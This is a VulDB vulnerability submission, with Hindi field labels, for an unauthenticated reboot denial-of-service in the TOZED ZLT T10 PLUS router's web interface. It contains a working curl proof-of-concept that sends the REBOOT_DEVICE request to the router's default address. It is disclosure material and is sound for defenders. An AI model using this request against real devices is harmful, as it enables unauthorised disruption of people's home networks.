| शीर्षक | TOZED ZLT T10 PLUS (ZLT family 4G CPE) T10PLUS_3.04.15 Denial of Service |
|---|
| विवरण | The router’s web interface accepts an unauthenticated POST request to `/reqproc/proc_post` with `goformId=REBOOT_DEVICE` and reboots the device without requiring an active authenticated session. This allows an attacker with network access to the router (LAN or guest network depending on configuration) to remotely reboot the device, causing a denial-of-service to the home network.
Proof-of-Concept (POC) HTTP request (tested on device):
curl -v -X POST "http://192.168.8.1/reqproc/proc_post" \
-H "Content-Type: application/x-www-form-urlencoded;charset=utf-8" \
--data "isTest=false&uniquelogincredentials=&goformId=REBOOT_DEVICE"
PoC video: https://youtu.be/3Me3wlH5cfU |
|---|
| स्रोत | ⚠️ http://192.168.8.1/reqproc/proc_post?isTest=false&uniquelogincredentials=&goformId=REBOOT_DEVICE |
|---|
| उपयोगकर्ता | Anonymous User |
|---|
| सबमिशन | 21/10/2025 10:37 PM (9 महीनों पहले) |
|---|
| संयम | 08/11/2025 05:44 PM (18 days later) |
|---|
| स्थिति | स्वीकृत |
|---|
| VulDB प्रविष्टि | 331635 [TOZED ZLT T10 T10PLUS_3.04.15 Reboot /reqproc/proc_post सेवा अस्वीकार] |
|---|
| अंक | 20 |
|---|